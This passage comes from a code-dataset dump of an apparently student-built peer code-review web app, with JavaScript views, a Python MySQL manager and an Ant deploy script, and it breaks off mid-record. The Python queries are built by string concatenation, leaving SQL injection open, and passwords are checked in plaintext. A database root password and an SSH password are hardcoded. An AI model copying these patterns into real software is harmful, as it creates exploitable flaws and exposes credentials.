"is_vendor": false,
"language": "JavaScript",
"length_bytes": 1053,
"license_type": "no_license",
"max_line_length": 72,
"num_lines": 56,
"path": "/views/see-standards-teacher/SeeStandardsTeacherView.js",
"repo_name": "Davidnln13/WORK-GS",
"src_encoding": "UTF-8",
"text": "/**Responsible for displaying what the user sees**/\nclass SeeStandardsTeacherView extends View\n{\n\tconstructor(controller)\n\t{\n\t\tsuper();\n\n\t\tthis.title = app.viewManager.VIEW.SEE_STANDARDS_TEACHER;\n\t\tthis.controller = controller;\n\t\tthis.setup();\n\t}\n\n\tonNotify (model, messageType)\n\t{\n\t\tif ( messageType === net.messageHandler.types.GET_STANDARD_SUCCESSFUL)\n\t\t{\n\t\t\tvar table = document.getElementById(\"standards-table\");\n\n\t\t\t// update review section\n\t\t\tvar rowCount = table.rows.length;\n\t\t\twhile(--rowCount)\n\t\t\t{\n\t\t\t\ttable.deleteRow(rowCount);\n\t\t\t}\n\n\n\t\t\tfor (var key in model.standards)\n\t\t\t{\n\t\t\t\tvar substandard = model.standards[key];\n\n\n\t\t\t\tfor(var i =0; i< substandard.length; i++)\n\t\t\t\t{\n\t\t\t\t\tvar row = table.insertRow(table.rows.length);\n\n\t\t\t\t\tvar cell0 = row.insertCell(0);\n\t\t\t\t\tvar cell1 = row.insertCell(1);\n\t\t\t\t\tvar cell2 = row.insertCell(2);\n\n\n\t\t\t\t\tcell0.innerHTML = substandard[i].category;\n\t\t\t\t\tcell1.innerHTML = substandard[i].subCategory;\n\t\t\t\t\tcell2.innerHTML = substandard[i].description;\n\t\t\t\t}\n\t\t\t}\n\n\t\t}\n\n\t}\n\n\n\tshow()\n\t{\n\t\tsuper.show();\n\t}\n}\n"
},
{
"alpha_fraction": 0.6599738001823425,
"alphanum_fraction": 0.6621562838554382,
"avg_line_length": 24.175825119018555,
"blob_id": "de4821001f0732184eb8fafab69e185159f828eb",
"content_id": "8f7eeba700a7fdbf93ecef5955efe9b011476bfc",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "HTML",
"length_bytes": 2291,
"license_type": "no_license",
"max_line_length": 210,
"num_lines": 91,
"path": "/views/code-view/code-view.html",
"repo_name": "Davidnln13/WORK-GS",
"src_encoding": "UTF-8",
"text": "<!DOCTYPE html>\n<html>\n<head>\n<link rel=\"stylesheet\" href=\"code-view.css\">\n</head>\n\n<body>\n\n<div class=\"box-left\" id=\"code-box\">\n<div id=\"file-select\">\n</div>\n<pre id=\"precode-area\" class=\"line-numbers\">\n<code id=\"code-review\" class=\"language-cpp\"></code>\n</pre>\n</div>\n\n<div class=\"box-right\" id=\"comment-box\">\n<div id=\"code-view-instructions\">\n<p>Click a filename to read it. Click a code element to create an issue or add comment (review mode). Click that code element again to remove it. Hovering over a sub-category will prompt the rule for it.</p>\n</div>\n\n\n\n\n<table id=\"review-data-table\">\n<tr>\n<th>Location</th>\n<th>Type</th>\n<th>Content</th>\n</tr>\n<tr>\n<td></td>\n<td></td>\n<td></td>\n</tr>\n</table>\n<div id=\"submit-review-div\">\n <button id=\"submit-review\" style=\"left: 37%; position: relative;\">Submit Review!</button>\n</div>\n\n</div>\n\n\n\n\n<!-- Side Modal with work to review -->\n<div id=\"code-review-side-modal\" class=\"sidenav\">\n <a href=\"javascript:void(0)\" class=\"closebtn\" id=\"code-review-side-modal-close\">×</a>\n <fieldset class=\"code-review-sidenav-fieldset\">\n <legend class=\"code-review-sidenav-legend\">What do you want to do?</legend>\n\n <div id=\"code-review-sidenav-choice-left\">Add a comment</div>\n <div id=\"code-review-sidenav-choice-right\">State the issue</div>\n\n </fieldset>\n\n <fieldset class=\"code-review-sidenav-fieldset\" id=\"code-review-sidenav-comment\">\n <legend class=\"code-review-sidenav-legend\">Please type your comment below</legend>\n <input type=\"textbox\" id=\"code-review-sidenav-comment-textbox\">\n\n <button id=\"submit-comment\" style=\"left: 37%; position: relative;\">Submit Comment</button>\n </fieldset>\n\n\n\n\n <fieldset class=\"code-review-sidenav-fieldset\" id=\"code-review-sidenav-issue-category\">\n <legend class=\"code-review-sidenav-legend\">Select the category of the issue</legend>\n <div id=\"code-review-category-select-div\">\n\n </div>\n\n </fieldset>\n\n <fieldset class=\"code-review-sidenav-fieldset\" id=\"code-review-sidenav-issue-subcategory\">\n <legend class=\"code-review-sidenav-legend\">Select the sub-category of the issue</legend>\n <div id=\"code-review-subcategory-select-div\">\n\n </div>\n\n </fieldset>\n\n\n\n\n\n</div>\n\n\n</body>\n</html>\n"
},
{
"alpha_fraction": 0.6784185171127319,
"alphanum_fraction": 0.6806849837303162,
"avg_line_length": 22.358823776245117,
"blob_id": "155b302596e7260b2f4479433b88a5f58eeaa92f",
"content_id": "bf03c062091a5f5487b996d0ba97148e86d1aaf5",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "JavaScript",
"length_bytes": 3971,
"license_type": "no_license",
"max_line_length": 132,
"num_lines": 170,
"path": "/views/assignments-student/AssignmentsStudentController.js",
"repo_name": "Davidnln13/WORK-GS",
"src_encoding": "UTF-8",
"text": "class AssignmentsStudentController\n{\n\tconstructor(model)\n\t{\n\t\tthis.model = model;\n\t\tthis.setup();\n\t\tthis.filesParsed = {};\n\t}\n\n\tsetup()\n\t{\n\t\tvar controller = this;\n\t\n\t\tconsole.log(this.model);\n\t}\n\n\tcreateSubmitAssignmentModal(id)\n\t{\n\t\tvar controller = this;\n\n\t\tvar modalBody = app.modalContentManager.getModalContent(\"submit-assignment\");\n\t\tvar modalData = app.uiFactory.createModal(\"add-assignment\", \"Submit Assignment\", modalBody, true);\n\t\tdocument.body.appendChild(modalData.modal);\n\t\tmodalData.modal.style.display = \"block\";\n\n\t\t// Find assignment\n\t\tvar assignment = undefined;\n\t\tfor (var i = 0; i < this.model.assignments.length; i++)\n\t\t{\n\t\t\tif( this.model.assignments[i].id === id)\n\t\t\t{\n\t\t\t\tassignment = this.model.assignments[i] ;\n\t\t\t}\n\n\t\t}\n\n\t\t// Description in modal.\n\t\tdocument.getElementById(\"assignment-description\").innerText = \"Description: \" + assignment.description;\n\t\tdocument.getElementById(\"assignment-deadline\").innerHTML = \"Deadline: \" + assignment.deadlineDate + \" \" + assignment.deadlineTime;\n\n\n\t\t// Adds logic to the filedrop area.\n\t\tthis.prepareFiledropArea();\n\n\n\t\tvar submitBtn = modalData.submit;\n\t\tsubmitBtn.addEventListener(\"click\", function ()\n\t\t{\n\t\t\tcontroller.submitAssignment(id);\n\t\t\tvar parentNode = modalData.modal.parentNode;\n\t\t\tparentNode.removeChild(modalData.modal);\n\n });\n\n\t}\n\n\tsubmitAssignment(assignmentID)\n\t{\n\t\tthis.model.submitAssignment(assignmentID, this.filesParsed);\n\t\tthis.filesParsed = {};\n\t}\n\n\tupdate()\n\t{\n\n\t}\n\n\tuploadFile(name, content){\n\t\tthis.filesParsed[name] = content;\n\t\tthis.updateModal();\n\t}\n\n\tdeleteFile(name){\n\t\tdelete this.filesParsed[name];\n\t\tthis.updateModal();\n\n\t}\n\n\tupdateModal(){\n\t\tvar controller = this;\n\t\tvar filesLoadedDiv = document.getElementById(\"files-loaded\");\n\t\tfilesLoadedDiv.innerHTML = \"\";\n\n\t\tfor (var key in this.filesParsed)\n\t\t{\n\n\t\t\tvar fileDiv = document.createElement(\"div\");\n\t\t\tfileDiv.className = \"file-uploaded-box\";\n\n\n\t\t\tvar deleteSpan = document.createElement(\"SPAN\");\n\t\t\tdeleteSpan.innerHTML = \"✖ \";\n\t\t\tdeleteSpan.id = \"delete-file#\" + key;\n\t\t\tdeleteSpan.addEventListener(\"click\", function()\n\t\t\t{\n\t\t\t\tcontroller.deleteFile(this.id.split(\"#\")[1]);\n\t\t\t});\n\n\t\t\tfileDiv.appendChild(deleteSpan);\n\n\t\t\tvar nameSpan = document.createElement(\"SPAN\");\n\t\t\tnameSpan.innerHTML = key;\n\t\t\tfileDiv.appendChild(nameSpan);\n\n\t\t\tfilesLoadedDiv.appendChild(fileDiv);\n\t\t\tfilesLoadedDiv.appendChild(document.createElement(\"BR\"));\n\n\t\t}\n\t}\n\n\n\tprepareFiledropArea()\n\t{\n\t\tvar controller = this;\n\n\t\tvar fileselect = document.getElementById(\"file-select\");\n\t\tvar\tfiledrag = document.getElementById(\"file-drag\");\n\t\tvar submitbutton = document.getElementById(\"submit-button\");\n\n\n\t\tvar fileDragHover = function(e) {\n\t\t\te.stopPropagation();\n\t\t\te.preventDefault();\n\t\t\te.target.className = (e.type === \"dragover\" ? \"hover\" : \"\");\n\t\t};\n\n\n\t\tvar fileSelectHandler = function (e) {\n\t\t\tfileDragHover(e);\n\t\t\tvar files = e.target.files || e.dataTransfer.files;\n\t\t\tfor (var i = 0, f; f = files[i]; i++)\n\t\t\t{\n\t\t\t\tparseFile(f);\n\t\t\t}\n\t\t};\n\n\t\t// output file information\n\t\tvar parseFile = function parseFile(file) {\n\t\t\tvar fileFormat = file.name.split(\".\")[1];\n\t\t\tif (fileFormat === \"cpp\" || fileFormat === \"h\") {\n\t\t\t\tvar reader = new FileReader();\n\t\t\t\treader.onload = function(e) {\n\t\t\t\t\tcontroller.uploadFile(file.name, reader.result);\n\t\t\t\t};\n\t\t\t\treader.readAsText(file);\n\t\t\t\tdocument.getElementById(\"messages\").innerHTML = \"\"\n\t\t\t}\n\t\t\telse {\n\t\t\t\tdocument.getElementById(\"messages\").innerHTML = \"Failed to load file \" + file.name + \".<br>\"\n\t\t\t}\n\t\t};\n\n\n\t\t// file select\n\t\tfileselect.addEventListener(\"change\", fileSelectHandler, false);\n\n\t\tvar xhr = new XMLHttpRequest();\n\t\tif (xhr.upload)\n\t\t{\n\t\t\t// file drop\n\t\t\tfiledrag.addEventListener(\"dragover\", fileDragHover, false);\n\t\t\tfiledrag.addEventListener(\"dragleave\", fileDragHover, false);\n\t\t\tfiledrag.addEventListener(\"drop\", fileSelectHandler, false);\n\t\t\tfiledrag.style.display = \"block\";\n\n\t\t\t// remove submit button\n\t\t\tsubmitbutton.style.display = \"none\";\n\t\t}\n\t}\n}\n"
},
{
"alpha_fraction": 0.5723541975021362,
"alphanum_fraction": 0.5723541975021362,
"avg_line_length": 23.36842155456543,
"blob_id": "287db29a9366b60dc9f8508247ccfea0719c62c0",
"content_id": "f4910aa1d61eed14d967a36401799dbaf78ca7d5",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "JavaScript",
"length_bytes": 926,
"license_type": "no_license",
"max_line_length": 51,
"num_lines": 38,
"path": "/js/Submission.js",
"repo_name": "Davidnln13/WORK-GS",
"src_encoding": "UTF-8",
"text": "class Submission\n{\n constructor(data)\n {\n this.id = data.id;\n this.userID = data.user_id;\n this.assignmentID = data.assignment_id;\n this.submissionData = data.submission_data;\n this.isComplete = data.is_complete;\n this.iteration = data.iteration;\n this.reviewersIDs = data.reviewers_ids;\n this.feedbacks = data.feedbacks;\n\n this.userData = {};\n if(data.user_data)\n {\n this.userData = data.user_data;\n }\n\n }\n\n serialize()\n {\n var data = {};\n\n data.id = this.id;\n data.user_id = this.userID;\n data.assignment_id = this.assignmentID;\n data.submission_data = this.submissionData;\n data.is_complete = this.isComplete;\n data.iteration = this.iteration;\n data.reviewers_ids = this.reviewersIDs;\n data.feedbacks = this.feedbacks;\n\n return data;\n\n }\n}\n"
},
{
"alpha_fraction": 0.7065868377685547,
"alphanum_fraction": 0.7065868377685547,
"avg_line_length": 22.19444465637207,
"blob_id": "c70b3777bcefa7ac113894908f56c3c95703b12f",
"content_id": "6087ff01a8ad24af4f5b9cf26841148ba2375ad1",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "JavaScript",
"length_bytes": 835,
"license_type": "no_license",
"max_line_length": 91,
"num_lines": 36,
"path": "/views/signin/SigninController.js",
"repo_name": "Davidnln13/WORK-GS",
"src_encoding": "UTF-8",
"text": "/**Controller for sign in**/\nclass SigninController\n{\n\tconstructor(model)\n\t{\n\t\tthis.model = model;\n\t\tthis.setup();\n\t}\n\n\tsetup()\n\t{\n\t\tvar that = this;\n\n\t\tvar signinButton = document.getElementById(\"signin-button\");\n\t\tsigninButton.addEventListener(\"click\", function(){that.signin()} );\n\n\t\tvar signupButton = document.getElementById(\"signup-link\");\n\t\tsignupButton.addEventListener(\"click\", function(){app.viewManager.goToView(\"signup\");} );\n\n\t\t//Design idea\n\t\t// bindClickFunction(signupButton, function(){app.viewManager.goToView(\"signup\");} );\n\n\t}\n\n\tsignin(e)\n\t{\n\t\tvar email = document.getElementById(\"signin-email\").value;\n \tvar password = document.getElementById(\"signin-password\").value;\n \tthis.model.signin(email,password);\n\t}\n\n\tshowError(errMessage)\n\t{\n\t\tdocument.getElementById(\"signin-error\").innerHTML = errMessage;\n\t}\n}\n"
},
{
"alpha_fraction": 0.6769846081733704,
"alphanum_fraction": 0.6795023679733276,
"avg_line_length": 23.375452041625977,
"blob_id": "e01a8e8e407917464716c2daed1ea2e7cd63c971",
"content_id": "21106630645c4617138fe061872dda662a6ea44b",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 6752,
"license_type": "no_license",
"max_line_length": 130,
"num_lines": 277,
"path": "/py/database_manager.py",
"repo_name": "Davidnln13/WORK-GS",
"src_encoding": "UTF-8",
"text": "import time\nimport traceback\nimport json\nfrom mysql.connector.pooling import MySQLConnectionPool\nfrom mysql.connector import errorcode\n\n\nclass DatabaseManager:\n\n\tdef __init__(self):\n\t\tprint(\"DatabaseManager: __init__\")\n\t\tself.createConnectionPool()\n\n\tdef createConnectionPool(self):\n\t\tdbconfig = {\n\t\t\"user\": \"root\",\n\t\t\"password\":\"xboxorpc7\",\n\t\t\"host\":'mihass-g-mysql', #set host to mysql using docker run link\n\t\t\"database\":'ProjectOrganiser',\n\t\t\"port\":'3306'\n\t\t}\n\n\t\ttry:\n\t\t\tself.cnxpool = MySQLConnectionPool(\n\t\t\t\tpool_name = \"mypool\",\n\t\t\t\tpool_size = 32,\n\t\t\t\t**dbconfig)\n\t\texcept:\n\t\t\t# sleep - hopefully will help - might be that the MySQL\n\t\t\t#container is not up and running yet\n\t\t\tprint(\"Exception... sleeping for 5 seconds then retry\")\n\t\t\ttb = traceback.format_exc()\n\t\t\tprint(\"tb: \" + tb)\n\t\t\ttime.sleep(5)\n\t\t\t# try again\n\t\t\treturn self.createConnectionPool()\n\n\tdef insert_into_table(self, table_name, my_dict):\n\t\tconnector = self.cnxpool.get_connection()\n\t\tcursor = connector.cursor(dictionary=True)\n\n\t\tplaceholders = \", \".join([\"%s\"] * len(my_dict))\n\n\t\tstmt = \"INSERT INTO `{table}` ({columns}) VALUES ({values});\".format(\n\t\t\ttable=table_name,\n\t\t\tcolumns=\",\".join(my_dict.keys()),\n\t\t\tvalues=placeholders\n\t\t)\n\n\n\t\tcursor.execute(stmt, list(my_dict.values()))\n\n\t\tconnector.commit()\n\t\tcursor.close()\n\t\tconnector.close()\n\t\tprint(\"complete\")\n\n\tdef update_table(self, table_name, tracker_arr):\n\t\tconnector = self.cnxpool.get_connection()\n\t\tcursor = connector.cursor()\n\t\tstmt = \"\"\n\n\t\tfor i in tracker_arr:\n\t\t\tstmt = \"UPDATE `{table}` SET {column} = CONCAT(ifnull({column},'{value}'), '{value}') WHERE {field} = '{conditional}';\".format(\n\t\t\t\ttable=table_name,\n\t\t\t\tcolumn=\"logs\",\n\t\t\t\tvalue=json.dumps(i),\n\t\t\t\tfield=\"email\",\n\t\t\t\tconditional=i[\"userID\"]\n\t\t\t)\n\n\t\t\tcursor.execute(stmt)\n\t\tconnector.commit()\n\t\tcursor.close()\n\t\tconnector.close()\n\t\tprint(\"table updated\")\n\n\n\tdef replace_into_table(self, table_name, my_dict):\n\t\tconnector = self.cnxpool.get_connection()\n\t\tcursor = connector.cursor(dictionary=True)\n\n\t\tplaceholders = \", \".join([\"%s\"] * len(my_dict))\n\n\t\tstmt = \"REPLACE INTO `{table}` ({columns}) VALUES ({values});\".format(\n\t\t\ttable=table_name,\n\t\t\tcolumns=\",\".join(my_dict.keys()),\n\t\t\tvalues=placeholders\n\t\t)\n\n\n\t\tcursor.execute(stmt, list(my_dict.values()))\n\n\t\tconnector.commit()\n\t\tcursor.close()\n\t\tconnector.close()\n\n\n\tdef select_all_from_table(self, table_name):\n\t\tconnector = self.cnxpool.get_connection()\n\t\tcursor = connector.cursor(dictionary=True)\n\n\t\tstmt = \"SELECT * FROM `\"+table_name+\"`;\"\n\n\t\t#print(stmt)\n\t\tcursor.execute(stmt)\n\t\tdata = cursor.fetchall()\n\t\tcursor.close()\n\t\tconnector.close()\n\n\t\treturn data\n\n\n\tdef delete_assignment(self, id):\n\t\t#Inserts a dictionary into table table_name\n\t\t#print(\"delete assignment\")\n\t\tid = str(id)\n\n\t\tconnector = self.cnxpool.get_connection()\n\t\tcursor = connector.cursor(dictionary=True)\n\n\t\tstmt = (\"DELETE FROM Assignments WHERE Assignments.id=\"+ id +\" LIMIT 1\")\n\t\t#print(stmt)\n\n\t\tcursor.execute(stmt)\n\n\t\tconnector.commit()\n\t\tcursor.close()\n\t\tconnector.close()\n\n\n\tdef delete_user(self, email):\n\t\t#Inserts a dictionary into table table_name\n\t\t#print(\"delete user\")\n\t\tconnector = self.cnxpool.get_connection()\n\t\tcursor = connector.cursor(dictionary=True)\n\n\t\tstmt = (\"DELETE FROM Users WHERE Users.email='\"+email+\"' LIMIT 1\")\n\t\t#print(\"stmt:\")\n\t\t#print(stmt)\n\t\tcursor.execute(stmt)\n\t\tconnector.commit()\n\t\tcursor.close()\n\t\tconnector.close()\n\n\tdef check_password(self, email, password):\n\t\t#return true if successful\n\t\t#print(\"check_password\")\n\t\tresult = False\n\n\t\tconnector = self.cnxpool.get_connection()\n\t\tcursor = connector.cursor(dictionary=True)\n\n\t\tquery = (\"SELECT * FROM Users WHERE Users.email='\"+email+\"' AND Users.password='\"+password+\"'\")\n\t\t#print(\"query:\")\n\t\t#print(query)\n\n\t\tcursor.execute(query)\n\t\tcursor.fetchall()\n\n\t\tif cursor.rowcount == 1:\n\t\t\tresult = True\n\n\t\tcursor.close()\n\t\tconnector.close()\n\n\t\treturn result\n\n\tdef get_user_info(self, message_data):\n\t\t#print (\"get_user_data\")\n\t\temail = message_data[\"email\"]\n\t\tprint(\"0\")\n\t\tconnector = self.cnxpool.get_connection()\n\t\tcursor = connector.cursor(dictionary=True)\n\t\tquery = (\"SELECT * FROM Users WHERE Users.email='\"+email+\"'\")\n\t\tprint(\"1\")\n\t\t#print(query)\n\n\t\tcursor.execute(query)\n\t\tdatas = cursor.fetchall()\n\t\tdata = datas[0]\n\n\t\tcursor.close()\n\t\tconnector.close()\n\t\treturn data\n\n\tdef get_all_users(self):\n\t\tconnector = self.cnxpool.get_connection()\n\t\tcursor = connector.cursor(dictionary=True)\n\t\tquery = (\"SELECT * FROM Users\")\n\n\t\t#print(query)\n\n\t\tcursor.execute(query)\n\t\tusers_table = cursor.fetchall()\n\t\tcursor.close()\n\t\tconnector.close()\n\n\t\t#sort it\n\t\tusers = []\n\t\tfor user_table in users_table:\n\t\t\tuser = {}\n\t\t\tuser[\"email\"] = user_table[\"email\"]\n\t\t\tuser[\"name\"] = user_table[\"name\"]\n\t\t\tuser[\"surname\"] = user_table[\"surname\"]\n\t\t\tusers.append(user)\n\n\t\treturn users\n\n\tdef select_submissions_for_user(self, user_id):\n\t\tprint(\"select_submissions_from_assignments\")\n\t\tuser_id = str(user_id)\n\t\tconnector = self.cnxpool.get_connection()\n\t\tcursor = connector.cursor(dictionary=True)\n\t\tquery = (\"SELECT * FROM Submissions WHERE Submissions.user_id=\" + user_id )\n\n\t\t#print(query)\n\n\t\tcursor.execute(query)\n\t\tdata = cursor.fetchall()\n\n\t\tcursor.close()\n\t\tconnector.close()\n\t\treturn data\n\n\n\tdef add_review(self, data):\n\t\tprint(\"add_review\")\n\t\tconnector = self.cnxpool.get_connection()\n\n\t\t# first we need to get the submission\n\t\tcursor = connector.cursor(dictionary=True)\n\t\tsubmission_id = str(data[\"submission_id\"])\n\t\tquery = (\"SELECT * FROM Submissions WHERE Submissions.id=\" + submission_id)\n\t\tcursor.execute(query)\n\t\tsubmission = cursor.fetchall()[0]\n\t\tcursor.close()\n\t\tconnector.close()\n\n\n\t\tfeedbacks = json.loads(submission[\"feedbacks\"])\n\t\tfeedbacks.append(data)\n\t\tsubmission[\"feedbacks\"] = json.dumps(feedbacks)\n\n\t\tself.replace_into_table(\"Submissions\", submission)\n\n\n\n\n\tdef update_review(self, data):\n\t\tprint(\"update_review\")\n\t\tconnector = self.cnxpool.get_connection()\n\n\t\t# first we need to get the submission\n\t\tcursor = connector.cursor(dictionary=True)\n\t\tsubmission_id = str(data[\"submission_id\"])\n\t\tquery = (\"SELECT * FROM Submissions WHERE Submissions.id=\" + submission_id)\n\t\tcursor.execute(query)\n\t\tsubmission = cursor.fetchall()[0]\n\t\tcursor.close()\n\t\tconnector.close()\n\n\n\t\tfeedbacks = json.loads(submission[\"feedbacks\"])\n\n\t\tfor i in range(0,len(feedbacks)):\n\t\t\tif feedbacks[i][\"reviewer_id\"] == data[\"reviewer_id\"]:\n\t\t\t\tif feedbacks[i][\"iteration_submitted\"] == data[\"iteration_submitted\"]:\n\t\t\t\t\t#print(\"FEEDback old:\", feedbacks[i])\n\t\t\t\t\tprint(\"FEEDback new:\", data[\"review\"])\n\t\t\t\t\tfeedbacks[i][\"review\"] = data[\"review\"] #TEST THIS PLACE\n\t\t\t\t\tprint(\"WHY\", feedbacks[i][\"review\"])\n\n\t\tsubmission[\"feedbacks\"] = json.dumps(feedbacks)\n\t\tprint (\"RESULT:\", submission[\"feedbacks\"])\n\n\t\tself.replace_into_table(\"Submissions\", submission)\n"
},
{
"alpha_fraction": 0.6493439674377441,
"alphanum_fraction": 0.6547465920448303,
"avg_line_length": 23.764331817626953,
"blob_id": "a26e07d9ca8e2835fc976aad886e16cd6e21217d",
"content_id": "e95fbe789653b4dce1837411c1a23c135e0d3c00",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Ant Build System",
"length_bytes": 3887,
"license_type": "no_license",
"max_line_length": 123,
"num_lines": 157,
"path": "/build.xml",
"repo_name": "Davidnln13/WORK-GS",
"src_encoding": "UTF-8",
"text": "<?xml version=\"1.0\"?>\n<project name=\"ProjectOrganiser\">\n\t<property name=\"ip\" value=\"gamecore.itcarlow.ie\"/>\n\n\n\t<target name=\"create_database\">\n\n\t</target>\n\n\n\t<!--Local build and run-->\n\t<target name=\"build_and_run\">\n\t<exec executable=\"docker-compose\">\n\t\t<arg value=\"-f\"/>\n\t\t<arg value=\"Docker/docker-compose.yml\"/>\n\t\t<arg value=\"down\"/>\n\t</exec>\n\t<exec executable=\"docker-compose\">\n\t\t<arg value=\"-f\"/>\n\t\t<arg value=\"Docker/docker-compose.yml\"/>\n\t\t<arg value=\"build\"/>\n\t</exec>\n\t<exec executable=\"docker-compose\">\n\t\t<arg value=\"-f\"/>\n\t\t<arg value=\"Docker/docker-compose.yml\"/>\n\t\t<arg value=\"up\"/>\n\t</exec>\n\t</target>\n\n\n\t<!--Build image of python server-->\n\t<target name=\"build_base_python_server\">\n\t<exec executable=\"docker\">\n\t\t<arg value=\"build\"/>\n\t\t<arg value=\"-t\"/>\n\t\t<arg value=\"python-server\"/>\n\t\t<arg value=\"-f\"/>\n\t\t<arg value=\"Docker/BaseServerDockerfile\"/>\n\t\t<arg value=\".\"/>\n\t</exec>\n\t</target>\n\n\n\t<!--Build image of python server-->\n\t<target name=\"build_python_server\">\n\t<exec executable=\"docker\">\n\t\t<arg value=\"build\"/>\n\t\t<arg value=\"-t\"/>\n\t\t<arg value=\"python-server\"/>\n\t</exec>\n\t</target>\n\n\n\t<!--Run all unit tests-->\n\t<target name=\"unit_tests\">\n\t<exec executable=\"python3\">\n\t\t<arg value=\"tests/test_signup.py\"/>\n\t\t<arg value=\"tests/test_signin.py\"/>\n\t</exec>\n\t</target>\n\n\n\t<!--run all selenium tests-->\n\t<target name=\"selenium_tests\">\n\t<exec executable=\"python3\">\n\t\t<arg value=\"tests/testbot.py\"/>\n\t</exec>\n\t</target>\n\n\n\t<!--Local build and run-->\n\t<target name=\"local_run\">\n\t<exec executable=\"docker-compose\">\n\t\t<arg value=\"up\"/>\n\t</exec>\n\t</target>\n\n\n\t<!--Local build and run-->\n\t<target name=\"local_run_fast\">\n\t<exec executable=\"docker-compose\">\n\t\t<arg value=\"-f\"/>\n\t\t<arg value=\"docker-compose-apache-python-only.yml\"/>\n\t\t<arg value=\"up\"/>\n\t</exec>\n\t</target>\n\n\n\t<!--Local build and run-->\n\t<target name=\"local_run_mysql\">\n\t<exec executable=\"docker-compose\">\n\t\t<arg value=\"-f\"/>\n\t\t<arg value=\"docker-compose-mysql-only.yml\"/>\n\t\t<arg value=\"up\"/>\n\t</exec>\n\t</target>\n\n\n\t<!--Build image of python server-->\n\t<target name=\"run_python_server\">\n\t<exec executable=\"docker\">\n\t\t<arg value=\"stop\"/>\n\t\t<arg value=\"server\"/>\n\t</exec>\n\t<exec executable=\"docker\">\n\t\t<arg value=\"rm\"/>\n\t\t<arg value=\"server\"/>\n\t</exec>\n\t<exec executable=\"docker\">\n\t\t<arg value=\"run\"/>\n\t\t<arg value=\"--name\"/>\n\t\t<arg value=\"server\"/>\n\t\t<arg value=\"--link\"/>\n\t\t<arg value=\"ProjectOrganiser_mysql_1:mysql\"/>\n\t\t<arg value=\"--net\"/>\n\t\t<arg value=\"ProjectOrganiser_default\"/>\n\t\t<arg value=\"-p\"/>\n\t\t<arg value=\"8080:8080\"/>\n\t\t<arg value=\"-d\"/>\n\t\t<arg value=\"-t\"/>\n\t\t<arg value=\"python-server\"/>\n\t</exec>\n\t</target>\n\n\n\t<target name=\"gamecore-build\">\n\t\t<!--<input message=\"Enter github username:\" addproperty=\"username\" />\n\t\t<input message=\"secure-input:\" addproperty=\"password\">\n\t <handler classname=\"org.apache.tools.ant.input.SecureInputHandler\" />\n\t\t</input>-->\n\t\t<taskdef name=\"sshexec\" classname=\"org.apache.tools.ant.taskdefs.optional.ssh.SSHExec\" classpath=\"lib/jsch-0.1.50.jar\" />\n\t\t<sshexec host=\"${ip}\"\n\t\t\tusername=\"gamecore\"\n\t\t\ttrust=\"true\"\n\t\t\tpassword=\"j01nin17.\"\n\t\t\tcommand=\"\n\t\t\t(cd MihassGamifiedMasterProject; sudo rm build.xml);\n\t\t\t(cd MihassGamifiedMasterProject; sudo git pull https://github.com/ITCOnlineGaming/MihassGamifiedMasterProject.git);\n\t\t\t(cd MihassGamifiedMasterProject; sudo git checkout test_branch);\n\t\t\t(cd MihassGamifiedMasterProject; sudo docker-compose -f Docker/docker-compose.yml build);\"\n\n\t\t/>\n\t</target>\n\n\n\t<target name=\"run\">\n\t\t<taskdef name=\"sshexec\" classname=\"org.apache.tools.ant.taskdefs.optional.ssh.SSHExec\" classpath=\"lib/jsch-0.1.50.jar\" />\n\t\t<sshexec host=\"${ip}\"\n\t\t\tusername=\"gamecore\"\n\t\t\ttrust=\"true\"\n\t\t\tpassword=\"j01nin17.\"\n\t\t\tcommand=\"\n\t\t\t(cd MihassGamifiedMasterProject; sudo docker-compose -f Docker/docker-compose.yml down);\n\t\t\t(cd MihassGamifiedMasterProject; sudo docker-compose -f Docker/docker-compose.yml up -d);\"\n\t\t/>\n\t</target>\n</project>"
},
{
"alpha_fraction": 0.6586757898330688,
"alphanum_fraction": 0.6598173379898071,
"avg_line_length": 16.176469802856445,
"blob_id": "f5101949a95a8a1816d93aa263f5394768df5f3f",
"content_id": "160d9bce43f253e4cfb3d089e0f307543be694ff",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "JavaScript",
"length_bytes": 876,
"license_type": "no_license",
"max_line_length": 73,
"num_lines": 51,
"path": "/views/see-standards-teacher/SeeStandardsTeacherController.js",
"repo_name": "Davidnln13/WORK-GS",
"src_encoding": "UTF-8",
"text": "class SeeStandardsTeacherController\n{\n\tconstructor(model)\n\t{\n\t\tthis.model = model;\n\t\tthis.setup();\n\t}\n\n\tsetup()\n\t{\n\t\tvar that = this;\n\t\tconsole.log(this.model);\n\n\t\t//pressing the button will call for an upload window for CVS.\n\t\tvar addStandards = document.getElementById(\"add-standards\");\n\t\tvar fileLoad = document.getElementById(\"standards-html-file\");\n\n\t\taddStandards.addEventListener(\"click\", function(){fileLoad.click();} );\n\t\tfileLoad.addEventListener(\"change\", function(){that.addStandard();});\n\t}\n\n\n\n\n\n\taddStandard()\n\t{\n\t\tvar that = this;\n\n\t\tvar file = document.getElementById(\"standards-html-file\").files[0];\n\t\tvar data = [];\n\n\t\tvar reader = new FileReader();\n \treader.onload = function()\n\t\t{\n\n \t\tvar file = reader.result;\n\n\t\t\tconsole.log(\"Read HTML: \", file);\n \t\tthat.model.pushStandards(file);\n \t};\n \treader.readAsText(file);\n\t}\n\n\n\n\tupdate()\n\t{\n\n\t}\n}\n"
},
{
"alpha_fraction": 0.6497747898101807,
"alphanum_fraction": 0.6559684872627258,
"avg_line_length": 22.0649356842041,
"blob_id": "1a7ba404e4304c9c35f0304b7e9389e9f67d7874",
"content_id": "325997ebf9a9c0574ff0de0718402ec6b8e7dfa3",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "JavaScript",
"length_bytes": 1776,
"license_type": "no_license",
"max_line_length": 79,
"num_lines": 77,
"path": "/views/see-submissions-student/SeeSubmissionsStudentView.js",
"repo_name": "Davidnln13/WORK-GS",
"src_encoding": "UTF-8",
